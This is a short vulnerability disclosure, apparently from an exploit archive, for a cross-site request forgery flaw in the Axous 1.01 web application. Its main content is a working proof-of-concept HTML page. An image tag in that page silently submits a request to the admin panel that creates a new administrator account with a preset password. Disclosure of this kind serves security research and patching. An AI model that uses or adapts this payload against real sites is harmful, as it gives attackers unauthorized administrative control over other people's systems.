axous101-xsrf.txt
Posted on 17 September 2010
<!------------------------------------------------------------------------ # Software................Axous 1.01 # Vulnerability...........Cross-site Request Forgery # Download................http://www.axous.com/ # Release Date............9/16/2010 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in Axous 1.01 can be # exploited to create a new admin. # # # --PoC--> <html> <body> <img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" /> </body> </html>
